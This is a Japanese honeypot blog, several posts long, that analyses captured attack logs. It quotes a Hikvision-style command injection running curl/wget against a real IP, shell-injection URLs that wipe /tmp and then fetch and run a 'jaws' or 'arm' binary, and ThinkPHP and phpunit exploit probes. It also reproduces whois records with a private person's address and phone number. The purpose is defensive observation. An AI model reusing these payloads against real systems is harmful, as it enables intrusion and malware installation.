ハニーレポート

ハニーポット観測レポートを中心に書いていきます。

初めての201リクエストが来たから調べたらやばいところからだった

ハニーポットを構築してからほとんどがGETリクエストでとりあえずつつく攻撃でしたので200レスポンスかログインアクセスをしてくるレスポンスとして401がほとんどでした。

本日のログに初めて201レスポンスを返す攻撃が来ました。

HTTPリクエストに関しては下記リンクを参考にすると良いと思います。

qiita.com

201レスポンスのコードはこちら。

[2022-02-24 05:14:20+0900] 104.236.150.159 "PUT /SDK/webLanguage HTTP/1.1"

PUTでファイルを置きに来てる感がありますね。

PUT /SDK/webLanguage HTTP/1.1

User-Agent: curl/7.58.0

Accept: */*

Connection: keep-alive

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Language: en-US,en;q=0.9,sv;q=0.8

Content-Length: 108

 

<?xml version="1.0" encoding="UTF-8"?><language>$(curl 45.94.156.22/hik || wget 45.94.156.22/hik)</language>

USと書いてありますが、ipアドレスcurlコマンドとwgetで何かダウンロードしようとしています。
ipアドレスを調べてみた結果は以下になります。

inetnum: 45.94.156.0 - 45.94.156.255
netname: UA-HOSTIQ country: UA   → (ウクライナ
admin-c: SN7141-RIPE
tech-c: SN7141-RIPE
tech-c: AR22074-RIPE
status: ASSIGNED PA
mnt-by: HOSTIQ-MNT
created: 2019-08-07T11:08:10Z
last-modified: 2019-08-07T11:08:10Z
source: RIPE

role: Abuse-C Role nic-hdl: AR22074-RIPE
org: ORG-PSMV2-RIPE
abuse-mailbox: abuse@vps.ua
mnt-by: VPSUA-MNT
address: 61015, Ukraine, Kharkiv, Donbasivskiy alley, 17, of. 59
created: 2014-08-14T13:49:57Z
last-modified: 2017-05-22T14:39:17Z
source: RIPE # Filtered


person: Skurikhin Nikolay
address: 61015, Kharkiv, Donbassovsky lane, 17, apartment 59
phone: +380503235698
nic-hdl: SN7141-RIPE
mnt-by: HOSTIQ-MNT
created: 2019-06-06T10:57:06Z
last-modified: 2019-06-06T10:57:06Z
source: RIPE

なんとウクライナから!!?
住所を調べるとハリコフがgooglemapで検索されました。
ハリコフってロシア国境付近ですよね・・・
この情勢に乗じての攻撃でしょうか・・

こういった世界的イベントや情勢の変化の時は攻撃なども活発になります。
今回はその良い例ではないでしょうか。

 

参考書籍

 

はるばるパナマからの大量アクセスwww

2月15日、16日に1000を超えるアクセスがありました。

ipアドレスを日別で集計すると犯人が見つかりました。
下記が集計結果です。

   2001 2022-02-16 201.218.229.228

   2001 2022-02-15 201.218.229.228

   1650 2022-02-16 210.210.26.37

    541 2022-02-09 60.248.99.121

    155 2022-02-05 60.248.99.121

    121 2022-02-04 89.248.168.215

     96 2022-02-16 2.56.56.192

     78 2022-02-19 210.210.26.37

     48 2022-02-17 1.169.56.187

     32 2022-02-19 109.237.103.9

※集計期間 2022/02/04-2022/02/20

201.218.229.228からのアクセスが合計4002回も来ています。
ipアドレスを調べるとパナマからのアクセスのようです。

% Joint Whois - whois.lacnic.net
% This server accepts single ASN, IPv4 or IPv6 queries
% LACNIC resource: whois.lacnic.net
% Copyright LACNIC lacnic.net
% The data below is provided for information purposes
% and to assist persons in obtaining information about or
% related to AS and IP numbers registrations
% By submitting a whois query, you agree to use this data
% only for lawful purposes.
% 2022-02-20 10:56:00 (-03 -03:00)

inetnum: 201.218.229.224/28
(マスク範囲)
status: reallocated
aut-num: N/A
owner: UFINET S.A. (Union Fenosa)
ownerid: PA-USUF-LACNIC
responsible: NET2NET IP Admin
address: Business Park, Costa del Este, 1, 1
address: 11111 - PA - country: PA   
→ (パナマ
phone: +507 3008888
owner-c: NEA3
tech-c: NEA3
abuse-c: NEA3
created: 20080207
changed: 20080207
inetnum-up: 201.218.224.0/19
(マスク範囲)
nic-hdl: NEA3
person: Net2Net Admin
e-mail: ipadmin@net2net.com.pa
address: Plaza Bal Harbour Paitilla, 1,
address: 55-0779 - Panama - PA country: PA   
→ (パナマ
phone: +507 206-3000 [ATM]
created: 20030414
changed: 20091028

% whois.lacnic.net accepts only direct match queries.
% Types of queries are: POCs, ownerid, CIDR blocks, IP
% and AS numbers.

取得できたアドレス情報を検索するとデジタルマーケティング系の会社が当たりました。
こんなところが攻撃してくることはないので、攻撃者が詐称したんでしょう。

Business Park, Costa del Este, 1, 1

panjiva.com

Plaza Bal Harbour Paitilla, 1, のアドレス情報が取れています。
この住所はパナマのショッピングモールのようです。

 

参考書籍

 

OSコマンドインジェクションいただきました

  下記のログを分析していくよ!

6350 /manager/html

    462 /

    157 /xmlrpc.php

     85 /.env

     42 /autodiscover

     27 91.218.66.202:4444

     27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

     19 /favicon.ico

     17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.sytes.net/jaws;sh+/tmp/jaws

     14 /?XDEBUG_SESSION_START=phpstorm

     13 /shell?cd+/tmp;rm+-rf+*;wget+%20http://23.94.7.175/.s4y/arm;sh+/tmp/arm

     13 /_ignition/execute-solution

     12 /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21

     12 /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

     12 /_profiler/phpinfo

     11 /debug/default/view?panel=config

     11 /console/

     11 /HNAP1/

     10 /solr/admin/info/system?wt=json

     10 /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>

https://oubonarumamay.hatenablog.com/entry/2022/02/15/210000

今日は上記のログの中の下記のログを見ていきます。

17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.sytes.net/jaws;sh+/tmp/jaws

17アクセスきたこの攻撃。
1行を分解していくと下記のコマンドになります。

/shell

cd /tmp

rm -rf *

wget botaflatoon.sytes.net/jaws

sh /tmp/jaws

OSコマンドインジェクションですね。[1]


shellに対して、tmpディレクトリに移り、rm -rf *でtmpディレクトリ内のファイル全て削除。
そして、wgetでbotaflatoon.sytes.net/jawsにアクセスして何かをダウンロードしようとしてます。
最後に sh /tmp/jawsでダウンロードしてきたファイルを実行するという命令です。
不正アクセスしたログを削除した上で、マルウェアをダウンロードして実行するというものですね。

下記ブログでも似た攻撃が観測されています。

oubonarumamay.hatenablog.com

他の攻撃も観測されていますね。
他の攻撃のレポートもどんどん書いていきたいと思います。

 

参考サイト

[1] 

OSコマンドインジェクションの仕組みとその対策 | セキュリティ対策 | CyberSecurityTIMES

 

使用しているハニーポット

 

URLログ分析 圧倒的管理者権限を取りにイクゥ!

ハニーポットアクセスログを見ていきます。

ログの集計期間は2/3〜2/16です。

アクセスログの中から10アクセス以上のURLを抽出しました。

   6350 /manager/html

    462 /

    157 /xmlrpc.php

     85 /.env

     42 /autodiscover

     27 91.218.66.202:4444

     27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

     19 /favicon.ico

     17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.sytes.net/jaws;sh+/tmp/jaws

     14 /?XDEBUG_SESSION_START=phpstorm

     13 /shell?cd+/tmp;rm+-rf+*;wget+%20http://23.94.7.175/.s4y/arm;sh+/tmp/arm

     13 /_ignition/execute-solution

     12 /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21

     12 /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

     12 /_profiler/phpinfo

     11 /debug/default/view?panel=config

     11 /console/

     11 /HNAP1/

     10 /solr/admin/info/system?wt=json

     10 /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>

/manage/htmlが圧倒的におおく6350アクセスですね。
管理者サイトにアクセスしようとしてますね。
管理者権限を取りに行こうとしてるのでしょう。
攻撃者のミッションの1つに権限昇格からの管理者権限を取り、侵入したサーバをコントロールすることがあります。
コントロール可能にしたら、機密情報を取ったり他のサーバへの攻撃用に使ったりします。
権限を奪取してもすぐに悪用せず、潜伏します。
このように権限をとってしまえば、やりたい放題ですので権限を取ってくるのです。

 

他にも攻撃の痕跡があります。
色々な攻撃を仕掛けてきているので、このログを他にも分析していきます。

 

 

今週のアクセス2/3-2/13

f:id:darjring:20220213233820p:plain


ハニーポットを植えてから10日ほど経ちました。
アクセス数を見ます。
2月9日のアクセスが急激に伸びてます。
基本的には土日のアクセスが多そうですね。
急激なアクセスの後はアクセス数70程度で推移しています。
この日に何が起きていたのでしょう??

次回はこの日のアクセスの中身を見ていこうと思います。